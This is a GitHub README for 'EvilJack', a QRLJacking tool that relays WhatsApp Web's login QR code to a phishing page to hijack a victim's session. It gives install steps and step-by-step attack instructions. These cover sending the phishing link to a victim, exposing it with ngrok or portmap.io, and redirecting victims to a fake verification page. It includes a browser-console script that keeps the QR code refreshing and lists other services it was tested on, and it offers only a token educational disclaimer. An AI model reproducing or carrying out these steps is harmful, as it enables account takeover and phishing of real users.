QRLJacking A New Form of qr code phishing
https://github.com/swagkarna/eviljack

hacking hacking-tool phishing phishing-attacks qrljacking whatsapp

---
* **If you like the tool, please leave a +1 star; it motivates me to develop other tools.**
---
## What is QRLJacking?
---

QRLJacking, also known as Quick Response Code Login Jacking, is a straightforward yet highly malicious attack method that targets applications utilizing the "Login with QR code" feature as a supposedly secure means of account access. The primary objective of this attack is to hijack users' sessions, enabling attackers to gain unauthorized access to their accounts.

---
## Installation ☑️

```
python -m venv venv
venv\Scripts\activate
pip install pyautogui pyzbar Pillow Flask pyocr pytesseract
```
If you get a DLL error from the pyzbar module, see:
https://stackoverflow.com/questions/64570443/q-how-to-fix-the-missing-dependancies-in-pyzbar

## Requirements 🧾


To install Tesseract OCR on Windows, follow these steps:

- Download the Tesseract OCR Installer:
- Visit the Tesseract OCR GitHub page: https://github.com/tesseract-ocr/tesseract

- Scroll down to the "Downloads" section and click on "tesseract-ocr-w64-setup-v5.x.x.exe" (where "x.x" represents the version number) to download the Windows installer for Tesseract OCR.

## Run the Tesseract Installer
- Double-click on the downloaded "tesseract-ocr-w64-setup-v5.x.x.exe" file to run the installer.

- Choose Components (Optional)
During the installation, you will be asked to select the components to install. You can keep the default options or customize them based on your needs. At a minimum, make sure the "Tesseract OCR" component is selected.

- Set Installation Path (Optional)
The installer will prompt you to choose an installation directory. You can keep the default or specify a different one. If you change the path, make sure to remember it for later steps.
## Add Tesseract to path
### Just add the folder to the Path under Windows (not sure with Win7)
- Control Panel > System and Security > System >
- Advanced system settings > Advanced > Environment variables > PATH > New
#### Add this to path

```
C:\Program Files\Tesseract-OCR
```

### Note: After adding Tesseract-OCR to the PATH, make sure to restart your PC
---
## EvilJack in Action
---
- Run evil_jack.py and server.py
- Open web.whatsapp.com in a separate window in your browser. Note: Do not close or minimize the window because EvilJack will continuously take screenshots of the QR code on web.whatsapp.com and send them to our phishing page.
- Now send the phishing link `127.0.0.1:5000` to the victim. Note: the link `127.0.0.1:5000` only works if the victim is connected to the same network. To perform the attack outside the WAN, use ngrok or portmap.io.
- After the victim scans the code, you will gain access to his WhatsApp session. Additionally, after the victim has scanned the QR code, he will be automatically redirected to a fake verification page
---
### PortForwarding with portmap.io

### Note: Make sure you forward port 5000 in portmap.io
---

## EvilJack Demo

https://github.com/swagkarna/EvilJack/assets/46685308/77fd0f85-8f85-47f3-a4fd-a6ffca758cde

---
### Script to auto-click the QR code reload element on WhatsApp Web

Open Chrome/Firefox, go to the Console tab in the developer tools, and paste the following code:
```
// Click the QR code reload button if it is currently present on the page
function checkAndClickButton() {
  const button = document.querySelector('.Jht5u');
  if (button) {
    button.click();
  }
}

// Set an interval to periodically check and click the button (every 2 seconds)
setInterval(checkAndClickButton, 2000);
```
## EvilJack tested on following sites

- [X] WhatsApp
- [X] Telegram
- [X] Discord
- [X] Steam
- [X] AirDroid
- [X] TikTok
---

## Disclaimer ⚠️
swagkarna provides no warranty and will not be responsible for any direct or indirect damage caused by this tool.

EVILJACK is built for Educational and Internal use ONLY.